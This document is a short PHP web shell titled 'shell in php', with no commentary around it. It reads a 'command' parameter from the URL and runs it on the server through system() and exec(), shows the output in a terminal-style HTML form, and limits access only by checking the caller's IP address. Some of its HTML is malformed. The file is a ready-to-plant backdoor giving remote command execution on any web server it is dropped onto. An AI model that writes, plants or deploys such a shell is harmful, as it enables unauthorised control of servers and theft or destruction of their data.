<?php
$DEBUG=0;
$init_dir="/var/www";
$allow_from="192.168.0.1";
if ( $REMOTE_ADDR !== $allow_from ) die ("Nope you can't connect");
if ($DEBUG) echo $command,$dir;
if ( !isset($command) ) $command="";
if ( isset($dir) or !($dir == "") ) {
$work_dir=trim(exec("cd $dir ; pwd"));
} else {
$work_dir=trim(exec("cd $init_dir ; pwd"));
}
if ( ereg("^cd", $command) ){
$change_dir=ereg_replace(";.$","",ereg_replace("^cd ","",$command));
$work_dir = trim(exec("cd $dir ; cd $change_dir ; pwd"));
}
if ( ereg("^cd", $command) ) $command=ereg_replace("^.;","",$command);
if ($command == "") $command = "wait";
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<html>
<head>
<title>shell in php</title>
</head>
<body bgcolor="#3F4682" text="white">
<center>
<table bgcolor="#2F8894" width="98%" cellspacing=2 cellpadding=1>
<tr><td>
<table width="100%" border=0 cellspacing=0 cellpadding=0>
<tr>
<td bgcolor="black">
<form name="myform" action="<?php echo $PHP_SELF ?>" method="GET">
<textarea color="black" readonly cols="65" rows="24"
style="font-weight: bold; color: white; background-color: black;
font-size: medium; border: 0 solid rgb(0,0,0); vertical-alignment: sub;">
<?php system("cd $work_dir;$command");?>
</textarea>
<table border=0 cellspacing=0 cellpadding=0>
<tr>
<td><b><font color="lightgreen"><?php echo $HTTP_HOST;?></font>:<font
<td>
<input type="text" name="command" value="" size="40" maxlength="255"
style="background-color:
font-weight: bold; font-size: medium;;">
</td></tr>
</table>
<input type="hidden" name="dir" value="<?php echo $work_dir ?>">
</form>
</td></tr>
</table>
</td></tr>
</table>
</center>
<?php if ($DEBUG) echo $command,"\n",$work_dir ?>
</body>
</html>